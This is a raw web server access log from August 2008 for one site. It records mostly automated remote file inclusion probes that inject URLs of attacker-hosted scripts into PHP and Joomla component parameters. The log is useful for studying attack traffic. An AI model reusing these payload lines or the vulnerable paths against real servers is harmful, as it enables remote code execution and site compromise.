58.102.118.201 - - [10/Aug/2008:10:36:44 -0700] "GET /logs/access_080110.log//htmltonuke.php?http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:44 -0700] "GET //htmltonuke.php?http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:44 -0700] "GET /logs//htmltonuke.php?http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:36:49 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:36:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:49 -0700] "GET /logs/access_080110.log//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:36:49 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:50 -0700] "GET //htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:50 -0700] "GET /logs//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:10:37:18 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:10:37:18 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:37:33 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:10:37:52 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 200 60002 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:10:38:06 -0700] "GET //?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 200 18447 "-" "libwww-perl/5.803" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:10:38:10 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:10:38:10 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:10:38:10 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:38:30 -0700] "GET /logs/access_080324.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:38:49 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:38:49 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:38:49 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:10:39:02 -0700] "GET /logs/index.php?sayfa=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:10:39:02 -0700] "GET /index.php?sayfa=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 18395 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:39:03 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:39:07 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:39:26 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:39:30 -0700] "GET /logs/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:39:37 -0700] "GET /index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:39:39 -0700] "GET /logs/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:39:42 -0700] "GET /index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.76" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:40:06 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:40:06 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:40:15 -0700] "GET /logs/?sourcedir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 59997 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:40:15 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:40:18 -0700] "GET /?sourcedir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 18417 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.211.29 - - [10/Aug/2008:10:40:35 -0700] "GET /bikes/CreSTOC07/?N=A HTTP/1.1" 200 15296 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:40:49 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:40:49 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:40:57 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:41:32 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:41:34 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:10:41:41 -0700] "GET //include.php?path%5Bdocroot%5D=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:41:54 -0700] "GET /logs/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:10:41:54 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:10:41:55 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:41:56 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:42:12 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:42:15 -0700] "GET /logs/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:42:17 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:42:22 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:42:22 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:43:11 -0700] "GET /errors.php?error=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:43:13 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:10:43:24 -0700] "GET /logs/access_080221.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:10:43:24 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:10:43:25 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:43:47 -0700] "GET /logs/access_080714.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:43:47 -0700] "GET /logs/access_080321.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:43:47 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:43:48 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 18495 "-" "libwww-perl/5.76" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:10:44:06 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:10:44:07 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:44:24 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:10:44:58 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:10:44:58 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:10:44:58 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:10:44:58 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:10:45:18 -0700] "GET /logs/access_080302.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:45:30 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:45:31 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 200 18591 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.248.189.82 - - [10/Aug/2008:10:46:09 -0700] "GET /logs/access_080218.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [10/Aug/2008:10:46:09 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [10/Aug/2008:10:46:09 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:10:46:18 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:46:19 -0700] "GET /config.inc.php?path_escape=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:46:19 -0700] "GET /logs/config.inc.php?path_escape=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:10:46:21 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:46:22 -0700] "GET /logs/access_080221.log/munity/modules/agendax/addevent.inc.php?agendax_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:46:22 -0700] "GET /logs/munity/modules/agendax/addevent.inc.php?agendax_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:46:22 -0700] "GET /munity/modules/agendax/addevent.inc.php?agendax_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:46:26 -0700] "GET /logs/access_080302.log/munity/modules/agendax/addevent.inc.php?agendax_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:46:51 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:46:52 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:46:52 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 18483 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:46:58 -0700] "GET /logs/access_080724.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:47:05 -0700] "GET /logs/access_080313.log%20/?sourcedir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:47:32 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:47:35 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.248.189.82 - - [10/Aug/2008:10:47:36 -0700] "GET /logs/access_071221.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:47:37 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:47:38 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:47:41 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 200 18631 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:47:42 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:10:48:06 -0700] "GET /logs//include.php?path%5Bdocroot%5D=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:10:48:06 -0700] "GET //include.php?path%5Bdocroot%5D=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.222.2.116 - - [10/Aug/2008:10:48:15 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 196608 "-" "ft tgwmea kvqgfBeppo6rjtntb" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:10:48:32 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:49:17 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:49:17 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.92.161.114 - - [10/Aug/2008:10:49:20 -0700] "GET /logs/access_080109.log HTTP/1.1" 200 621135 "-" "Rjpoek kqil osfyvdnwt" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:49:24 -0700] "GET /logs/access_080404.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:49:24 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:49:25 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:49:52 -0700] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:50:08 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 18469 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:50:10 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:50:10 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:50:11 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:50:26 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:10:50:36 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:10:50:39 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18599 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:51:06 -0700] "GET /logs/access_080221.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:51:06 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:51:11 -0700] "GET /logs/access_080209.log/?sourcedir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:10:51:14 -0700] "GET /logs/access_080225.log/community/modules/agendax/addevent.inc.php?agendax_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
